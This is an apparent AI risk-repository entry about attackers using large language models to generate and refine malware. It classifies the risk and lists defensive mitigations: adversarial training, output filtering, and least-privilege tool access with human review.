Security
Though chatbots cannot (yet) develop their own novel malware from scratch, hackers could soon potentially use the coding abilities of large language models like ChatGPT to create malware that can then be minutely adjusted for maximum reach and effect, essentially allowing more novice hackers to become a serious security risk
ENTITY
1 - Human
INTENT
1 - Intentional
TIMING
2 - Post-deployment
Risk ID
mit514
Domain lineage
4. Malicious Actors & Misuse
4.2 > Cyberattacks, weapon development or use, and mass harm
Mitigation strategy
1. Prioritize Model Hardening through Adversarial Training: Continuously conduct targeted adversarial training and red-teaming exercises to expose the Large Language Model (LLM) to simulated attack scenarios designed to elicit malicious code generation, thereby improving model alignment and resilience against known and emerging jailbreaking techniques (Sources 2, 5, 11). 2. Implement Multi-Layered Output Sanitization and Filtering: Deploy automated, context-aware content moderation and postprocessing filters to strictly audit, sanitize, and block generated outputs that contain unsafe code snippets, common malware binaries, suspicious command sequences, or instructions capable of leading to security breaches, ensuring that model responses are treated as untrusted data (Sources 2, 6, 7, 11). 3. Enforce Strict Tool-Use Restrictions and Least Privilege: Apply the principle of least privilege by strictly limiting the LLM's functional capabilities and agentic access to external tools and systems. High-risk operations, such as code execution, modification of records, or initiation of transactions, must be restricted, require explicit human-in-the-loop validation, or be isolated within sandboxed environments (Sources 5, 7, 9, 13).